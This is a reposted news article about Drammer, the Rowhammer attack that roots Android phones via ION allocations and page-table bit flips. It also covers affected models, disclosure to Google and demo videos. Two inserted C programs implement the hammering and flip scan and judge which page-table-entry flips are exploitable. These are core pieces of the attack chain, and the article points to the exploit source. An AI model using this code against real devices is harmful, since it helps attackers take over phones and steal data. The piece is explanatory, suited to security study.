Hacking Book | Free Online Hacking Learning


How to exploit the Rowhammer vulnerability to root Android phones (with demo video + exploit source code)

Posted by graebner at 2020-02-27

Security researchers have recently found a new way to root Android phones: exploiting the Rowhammer vulnerability in DRAM. The attack can also be combined with already known Android vulnerabilities (BAndroid and Stagefright) to compromise a target user's device.

In early 2015, Google's Project Zero team showed that an attacker could exploit a physical design defect in DRAM to gain kernel privileges on a Linux computer. Now attackers can use the same defect to root millions of Android phones.

Researchers from the VUSec lab at Vrije Universiteit Amsterdam have now adapted the Rowhammer attack, which targets the dynamic random-access memory (DRAM) of a device, to mobile phones. Rowhammer itself has been known for some time, but this is the first time it has been shown to work on mobile devices.

What is a Rowhammer attack on DRAM?

Rowhammer attacks on mobile devices are just as damaging. Until Google ships a patch, the problem puts sensitive data on millions of Android phones at risk.

To launch a Rowhammer attack, the attacker runs malware that repeatedly accesses one row of DRAM cells; this repeated access is called "hammering". Hammering a row disturbs the physically adjacent rows and causes their cells to leak charge. Eventually this interference flips bits in the data stored in those neighbouring rows. The data in memory has now changed without ever being written to, and that is what gives the attacker a new way to take control of the device.

In short, a Rowhammer attack repeatedly accesses one row of a modern DRAM chip so that bits in adjacent rows flip. The technique lets an attacker modify data stored in the device's memory without having write access to it.

Google's Project Zero team wrote in its published research report:

"As DRAM manufacturing density increases and components get physically smaller, it becomes very difficult for manufacturers to pack more memory capacity onto a chip while still preventing electromagnetic interference between memory cells. The consequence is that reading and writing a single region of memory can disturb an adjacent region, causing current to flow into or out of the neighbouring memory cells. If a large number of reads and writes are repeated, the contents of adjacent cells can change, so that a stored 0 becomes a 1, or a 1 becomes a 0."
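The hammering loop and the bit-flip check described above, written out as an added example (this is not code from the Drammer project or from the original post). The program fills a "victim" row with a known pattern, alternates reads of two "aggressor" rows, then scans the victim for bytes that changed. The row size, the use of `malloc` (which gives no guarantee that the three regions are physically adjacent rows) and the x86-64 `clflush` path are all assumptions made for the example; on ARM there is no unprivileged cache flush, which is exactly why Drammer had to obtain uncached, physically contiguous memory some other way.

```c
/* Added example: minimal Rowhammer probe (not the Drammer code).
 * Assumptions: ROW_BYTES is a guessed row size; malloc() does not give
 * physically contiguous memory, so on a real device the three regions must
 * come from something like ION and the address-to-row mapping must be known. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ROW_BYTES (64 * 1024)   /* assumed row size; real parts vary */
#define PATTERN   0xFFu         /* all ones, so any 1->0 flip is visible */

/* One read of *a that reaches DRAM rather than the cache (x86-64 only;
 * elsewhere the read is served from cache and will not hammer anything). */
static inline void read_uncached(volatile uint8_t *a) {
    uint8_t x = *a;
    (void)x;
#if defined(__x86_64__)
    __builtin_ia32_clflush((const void *)a);
#endif
}

/* The "hammer": alternate accesses to two aggressor rows.
 * Returns the total number of accesses performed. */
unsigned long hammer_pair(volatile uint8_t *agg1, volatile uint8_t *agg2,
                          unsigned long iters) {
    unsigned long i;
    for (i = 0; i < iters; i++) {
        read_uncached(agg1);
        read_uncached(agg2);
    }
    return 2 * iters;
}

/* Scan len bytes of victim for bytes that no longer equal pattern.
 * Stores up to max_out (offset, xor-mask) pairs; returns total flips found. */
size_t scan_flips(const uint8_t *victim, size_t len, uint8_t pattern,
                  size_t *off_out, uint8_t *mask_out, size_t max_out) {
    size_t found = 0, i;
    for (i = 0; i < len; i++) {
        if (victim[i] != pattern) {
            if (found < max_out) {
                off_out[found]  = i;
                mask_out[found] = (uint8_t)(victim[i] ^ pattern);
            }
            found++;
        }
    }
    return found;
}

/* Double-sided test: victim row sandwiched between two aggressor rows.
 * buf must hold at least 3 * ROW_BYTES. Returns flipped bytes in the victim. */
size_t test_three_rows(uint8_t *buf, unsigned long iters,
                       size_t *off_out, uint8_t *mask_out, size_t max_out) {
    uint8_t *agg1 = buf, *victim = buf + ROW_BYTES, *agg2 = buf + 2 * ROW_BYTES;
    memset(victim, PATTERN, ROW_BYTES);
    hammer_pair(agg1, agg2, iters);
    return scan_flips(victim, ROW_BYTES, PATTERN, off_out, mask_out, max_out);
}

int main(void) {
    uint8_t *buf = malloc(3 * ROW_BYTES);
    size_t offs[16];
    uint8_t masks[16];
    size_t n, i;
    if (!buf) return 1;
    n = test_three_rows(buf, 2000000UL, offs, masks, 16);
    printf("%zu flipped bytes in victim row\n", n);
    for (i = 0; i < n && i < 16; i++)
        printf("  offset 0x%zx mask 0x%02x\n", offs[i], masks[i]);
    free(buf);
    return 0;
}
```

A zero result says nothing about the DRAM; it usually means the three buffers were not adjacent rows or the accesses never left the cache. Real testers sweep many candidate rows and several data patterns (all zeros catches 0->1 flips) and record each flip's offset, direction and repeatability, because the later exploitation step needs a flip that can be reproduced on demand.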

Is your Android phone affected?

To test Rowhammer attacks on Android phones, the researchers built a new proof-of-concept exploit called Drammer. Their testing showed that the technique not only modifies memory contents on many popular phones but can also be used to root them.

Phones the researchers successfully rooted include Google's Nexus 4 and Nexus 5, LG's G4, Samsung's Galaxy S4 and Galaxy S5, Motorola's Moto G (2013 and 2014) and the OnePlus One. Phones from other brands are expected to be affected by the Drammer attack as well.

The researchers write in their paper [PDF]:

"Our Drammer attack demonstrates that Rowhammer is a real security threat to billions of mobile users. Our experiments also show that Rowhammer attacks are not limited to the x86 platform but also apply to mobile devices."

How the Drammer attack works

To exploit the vulnerability, the researchers developed a malicious app containing the exploit code (see the link at the end of the article). The app needs no special permissions to root the phone, which also makes it unlikely to raise suspicion with users or anti-virus software. The attacker still has to get the victim to install the app that carries the exploit.

The attack also needs direct access to DRAM, which it obtains through Android's ION memory allocator. ION gives every app direct, uncached access to physically contiguous DRAM, and that contiguity lets the app work out which DRAM rows are physically adjacent, a prerequisite for targeting bit flips at a chosen row.

With that information, the researchers still had to work out how to turn a bit flip into root on the target device. Once they have full control of the phone, they can extract any data from it.

The researchers explain:

"In short, our attack drives the physical memory allocator into a particular state by exhausting memory chunks of different sizes. In that state it serves further requests from predictable memory regions. We can then steer the allocator into placing sensitive data, such as a page table, at a physical memory location that is prone to bit flips. This is what lets Drammer take over the device."

Once the target installs the malicious app, the Drammer exploit roots the phone within minutes (sometimes within seconds), and the whole process needs no user interaction. The attack keeps running even while the victim is using another app or the phone is asleep.
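Why a flip landing in a page table is the prize, shown as an added example (not code from the Drammer paper or the original post). Once the allocator has placed a page table in a page with a known, repeatable flip, the flip hits one page-table entry (PTE). If the flipped bit lies in the entry's physical-address field, the entry silently points at a different physical frame; Drammer aims for that frame to be one the attacker controls (in the real exploit, the page table itself), which turns the flip into read/write access to page tables and from there to kernel memory. The descriptor layout below is the AArch64 level-3 4 KiB page format and is an assumption of this example (32-bit ARMv7 short descriptors differ); the sample PTE and flip position are constructed.

```c
/* Added example: which bit flips in a page-table page are useful?
 * Assumed layout: AArch64 level-3 (4 KiB page) descriptor, little-endian,
 * output address in bits [47:12], bit 0 = valid, bit 1 = page (not block). */
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define PAGE_SHIFT    12
#define PTE_SIZE      8
#define PTE_ADDR_MASK 0x0000FFFFFFFFF000ULL   /* bits [47:12] */
#define PTE_VALID     (1ULL << 0)
#define PTE_PAGE      (1ULL << 1)

/* Effect of one flip on one PTE. */
struct flip_effect {
    size_t   pte_index;   /* which of the 512 entries in the page is hit */
    int      pte_bit;     /* bit index (0..63) within that entry */
    bool     in_addr;     /* true if the bit is part of the address field */
    uint64_t old_pfn;     /* frame number before the flip */
    uint64_t new_pfn;     /* frame number after the flip */
};

/* Map (byte offset within the 4 KiB page, bit within that byte), as
 * reported by the hammering phase, to (entry index, bit within entry). */
struct flip_effect locate_flip(size_t byte_off, int bit_in_byte) {
    struct flip_effect e = {0};
    e.pte_index = byte_off / PTE_SIZE;
    e.pte_bit   = (int)((byte_off % PTE_SIZE) * 8) + bit_in_byte;
    e.in_addr   = ((1ULL << e.pte_bit) & PTE_ADDR_MASK) != 0;
    return e;
}

/* Apply the flip to a concrete entry value and compute old/new frames. */
struct flip_effect apply_flip(uint64_t pte, size_t byte_off, int bit_in_byte) {
    struct flip_effect e = locate_flip(byte_off, bit_in_byte);
    uint64_t flipped = pte ^ (1ULL << e.pte_bit);
    e.old_pfn = (pte & PTE_ADDR_MASK) >> PAGE_SHIFT;
    e.new_pfn = (flipped & PTE_ADDR_MASK) >> PAGE_SHIFT;
    return e;
}

/* A flip is useful for Drammer-style page-table takeover when it moves a
 * valid page entry's frame into the attacker-controlled physical range
 * [lo, hi). Flips in attribute bits, or in entries that are not valid page
 * mappings, are ignored here (they may crash or do nothing useful). */
bool flip_is_exploitable(uint64_t pte, size_t byte_off, int bit_in_byte,
                         uint64_t attacker_pfn_lo, uint64_t attacker_pfn_hi) {
    struct flip_effect e;
    if ((pte & (PTE_VALID | PTE_PAGE)) != (PTE_VALID | PTE_PAGE))
        return false;
    e = apply_flip(pte, byte_off, bit_in_byte);
    if (!e.in_addr)
        return false;
    return e.new_pfn >= attacker_pfn_lo && e.new_pfn < attacker_pfn_hi;
}

int main(void) {
    /* Constructed sample: a valid entry mapping frame 0x80001 (attributes in
     * the low bits), and a flip observed at byte 1, bit 4 of the page, which
     * is bit 12 of entry 0, the lowest address bit. */
    uint64_t pte = 0x0000000080001703ULL;
    struct flip_effect e = apply_flip(pte, 1, 4);
    printf("entry %zu bit %d: in address field=%d, frame 0x%llx -> 0x%llx, "
           "exploitable=%d\n",
           e.pte_index, e.pte_bit, (int)e.in_addr,
           (unsigned long long)e.old_pfn, (unsigned long long)e.new_pfn,
           (int)flip_is_exploitable(pte, 1, 4, 0x80000, 0x80010));
    return 0;
}
```

The direction of the flip matters as much as its position: a 1->0 flip in bit 12 moves the entry to the frame just below, a 0->1 flip to the frame just above, so the allocator-massaging step has to place the page table relative to the attacker's chunk accordingly. That is the reason the hammering phase records each flip's direction, not just its offset.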

No complete fix is available yet

The researchers reported the vulnerability to Google in July 2016. Google classified it as a high-severity vulnerability and paid the researchers a $4,000 reward under its vulnerability reward program.

Google said it notified its partners as soon as it had the details of the vulnerability, and that its November security bulletin would include a mitigation for the Drammer attack.

The researchers warn, however, that the memory chips in phones already in users' hands cannot be replaced, so the problem will not be fully fixed any time soon. Moreover, Drammer relies on basic operating-system functionality, and removing or restricting that functionality would noticeably degrade the user experience. In short, even the next generation of Android phones will be hard to fix completely.

Attack demo + exploit PoC

The researchers released two proof-of-concept videos showing Drammer attacks against an LG Nexus 5.

In the first video, the test phone runs Android 6.0.1 with Google's 5 October 2016 security patch level installed.

In the second video, the researchers combine the Stagefright vulnerability with the Drammer attack to compromise older Android phones that have not been patched.

Drammer attack demo against Android 6.0.1 (video):

Stagefright + Drammer attack demo (video):

Exploit source code: (link in the original post)

*Reference sources: The Hacker News, Softpedia. Compiled by FreeBuf editor Alpha_h4ck; please credit freebuf.com when reposting.